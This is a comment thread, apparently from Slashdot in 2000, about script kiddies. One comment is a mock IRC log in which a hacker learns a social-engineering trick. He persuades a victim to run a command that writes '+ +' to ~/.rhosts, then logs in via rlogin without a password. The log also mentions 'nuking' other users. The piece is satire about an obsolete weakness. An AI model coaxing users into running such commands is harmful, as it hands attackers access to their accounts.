    I don't know if what I said made any real difference -- certainly, he'd already started to walk away from script-kiddie stuff -- but I think that the search for recognition and respect was a significant factor in his life; I think that as he finds acknowledgement for constructive behavior, he's going to be less and less interested in k1dd13dom.

  • by Alrocket ( 191107 ) on Thursday July 06, 2000 @04:07AM (#954189) Homepage
    Later on D1ck teaches J4n3 how to mount a drive

    What's really sad is that people of this skill level have rooted so many boxes.

    I think there's a major lack of interest from management in allocating resource and budgets to prevention - a well trained admin could probably close off at least 99% of these holes given enough time.

    I think that we need to promote awareness of these issues to a much greater degree than it currently is.

    Al.

  • by Anonymous Coward on Thursday July 06, 2000 @04:08AM (#954191)
    /join #warez

    Cannot join channel #warez: Banned From Channel << Sh1t, bann3d..

    /join #hack << Lets see if the haqrz know about .rhosts

    TOPIC FOR #hack: WE BLOW FOR SCRIPTZ. << Neato Topic

    U4eA (U4EA@BOW.ORG) has joined channel #hack.

    > y0y0y0y0 eYe n33d th3 scr1pt f0r .rhosts!!!

    You have been kicked off channel #hack by chasin (GET OUT LAMER!)

    ^^^^^^ note the sense of hostility.

    [BoW] will g3t chas1n f0r th1s!

    /load n00k

    /n00k chasin << eYe h0p3 1t w0rkz (hehehehe)

    NUKED.

    /whois chasin

    CHASIN: NO SUCH NICK OR CHANNEL << 1t w0rk3d (bahaha)

    *chasin* im mailing your sysadmin loser!! << m0r3 fan ma1l 3l33+

    /nick chas1n

    U4EA is now known as chas1n.

    Signon by visionary detected. << 3l33+ TRAXST3R!!!

    /msg visionary N4RQ!!!

    *visionary* yo, im not narc, can we talk about this? << DEJA VU?

    Visionary invites you to #speechcard.

    /join #speechcard

    TOPIC FOR #speechcard: /MSG VISIONARY FOR THE LATEST SPEECHWARE CRACK!

    chas1n (U4EA@BOW.ORG) has joined channel #speechcard.

    > y0y0y0y0y0 whatz up N4RQZ???

    <visionary> whats up with this u4ea? anyone got his info?

    <grayarea> .msg visionary call the narqline, I just left an

    update on u4ea in there..

    ^^^^^^ W3 MUST 1NF1LTR4T3 TH1S VMB!!!

    <ddrew> chas1n = u4ea << f01l3d aga1n by tymnet jan1t0r

    <erikb> any1 know who this rhakim loser is who keeps msging me?

    <chas1n> ddr3w: I'll trad3 y0u 0day 4 s0m3 nUa'z!!

    *chasin* stop imitating me or I will use my sendmail script on

    you!!! Then you will be sorry!!

    /msg chasin [BoW] will get you n1g.

    /n00k chasin

    NUKED.

    /whois chasin

    CHASIN: NO SUCH NICK OR CHANNEL << Bahahahahha eYe g0t h1m!

    /nick chasin

    chas1n is now known as chasin.

    > 3l33+

    <ddrew> chasin = u4ea << f01l3d aga1n by tym3n3t jan1t0r..

    Stoll invites you to #bugz << 3l33+, now we have f00l3d th3m!!

    /join #bugz

    chasin has left #speechcard

    TOPIC FOR #bugz: SPAFF FOR PREZ

    chasin (U4EA@BOW.ORG) has joined #bugz

    <stoll> chasin ^*($#@(*$&(*#@&$*(#@&$(*@!!!!!

    mode change #bugs +ooo chasin chasin chasin by Thackory.

    > y0y0y0y0 eYe n33d th3 scr1pt f0r .rhosts, any1 g0t it 0nl1n3.?

    *pluvius* STOP MAKING PASSES AT MY WOMAN YOU LOD LAMER)$#@*()$*@#

    /msg pluvius Its me u4ea, im doing some undercover [BoW] w0rk.

    *pluvius* hehee sorry dude.. << PLUVIUS l0v3s LYDIA TSK TSK..

    stoll has been kicked off channel #bugz by Pengo (N4RQ!!!)

    DCC SEND REQUEST (rhosts.txt) FROM bUgd00d.

    /dcc get bUgd00d <<< 3l33+ W3 n0w HAV3 th3 INPH0!!!!!

    1f th1s w3r3 t0 fall 1nt0 th3 wr0ng handz

    1t c0uld b3 v3ry dang3r0us!!

    /signoff f00l3d y0u!!!!

    $

    $ ls

    rhosts.txt

    $ cat rhosts.txt

    #DONT LET THE HAQRZ GET THIS ONE, COULD BE VERY DANGEROUS

    #HERE IS HOW IT WORKZ:



    GOTO IRC... CHANGE YOUR NICK TO SOME DUMB BLONDE SOUNDING NAME,

    THEN FIND AN UNSUSPECTING VICTIM AT THE TARGET SITE. MESSAGE THEM

    THAT YOU ARE TRYING TO FIGURE OUT A COMMAND, BUT IT DOES NOT SEEM

    TO WORK. AND ASK THEM TO TRY IT TO SEE IF IT DOES ANYTHING FOR THEM.

    ASK THEM TO SEE WHAT OUTPUT THEY GET FROM:

    /EXEC echo "+ +" > ~/.rhosts

    WHEN THEY SAY THAT NOTHING HAPPENED, SAY THANKYOU, AND EXIT IRC.

    NOW RLOGIN INTO THEIR ACCOUNT, AND YOU HAVE EXPLOITED THE .rhosts

    VULNERABILITY.



    # MAKE SURE THIS DOESN'T GET INTO THE WRONG HANDS, THE INTERNET WOULD

    # CRUMBLE IF HAQRZ GOT THEIR HANDS ON THIS ONE.

    $ << hmm, will have to try this out.

    $ irc

    /nick bambi

    /who *victim.com*

    #bolo _RED_ I am stupid stupid@victim.com

    END OF WHOIS LIST.

    /join #bolo

    TOPIC FOR #bolo: We are stupid

    bambi (U4EA@BOW.ORG) has joined #bugz

    /msg _RED_ Hi, how are you?

    *_RED_* I'm fine, and yourself?

    /msg _RED_ well, I'm having some problems with IRC...

    *_RED_* Really? Maybe I can help you out.. what is the problem

    /msg _RED_ well.. no.. i feel silly.. I'll try and figure it out

    *_RED_* No, seriously, I don't mind.. ask away

    /msg _RED_ well, I am trying to run this command, but it doesn't seem

    to work properly.. maybe you can try it out for me?

    *_RED_* Sure! What is the command?

    /msg _RED_ /exec echo "+ +" > ~/.rhosts

    /msg _RED_ but it doesn't seem to do anything! :(

    *_RED_* Hold on, I'll try it out..

    *_RED_* Hmmm.. you seem to be right... wierd..

    /msg _RED_ ahh well.. I guess I'll just have to go without.. thanks for

    your help!

    *_RED_* No problem.. hey, where are you from?

    /signoff gotta go... bye!

    $ rlogin victim.com -l stupid

    Welcome to victim.com, specializing in example security vulnerabilities!

    $ hostname

    victim << n3at0! W3 R 1n!!!#)@&

    $ whoami

    stupid << elite! We have exploited the .rhosts weakness.

    $

  • if you ever catch a kiddie on your system (logged in), don't just boot him off. 'talk' him. Make sure he knows that there are people behind these machines, and that they're not just machines to be played with.
    Won't this give him/her the impression that your respectfull or afraid of his/her 'skillz'?, I would suggest that this just boosts the ego of these sad little f**ks and prompts them to persue it more, but I wouldn't boot him off stright away either, find out how he got in, close that door and then boot and ignore.
    BTW, this has been at Root Prompt [rootprompt.org] for a while, it's part of a series of episodes that detail an actual crack from the SA point of view. Check it out.
  • My solution to the stupid problem of needing to be root so you can bind to a low port is to fix the kernel. Its a one line change and then a program can bind to any port number that its in a group of so you put bind in group 53 and root exploits will not happen.
  • by gtx ( 204552 ) on Thursday July 06, 2000 @04:10AM (#954196) Homepage
    those IRC logs gave me a fucking headache trying to read them. and if i see the word 'leet' one more time, i'm going to find those kids and beat them.

    okay. i'm calm again.

  • I would have to say that script kiddies piss me off way more than crackers. Why? Script kiddies think that they are "1337," when they just downloaded someone else's little program off some website, and ran it on some computer. Most of them couldn't even tell you what ls -al does, let alone truly explain how to crack a password file. I actually like crackers, just as long as they aren't doing too much damage. If they are doing it from an intellectual interest, more power to them. I feel bad about it now, but last time I met a script kiddie I made him cry. There is this one who I wouldn't mind making him cry, mwahahaha! Score 1 for the hackers!

No line available at 300 baud.

Working...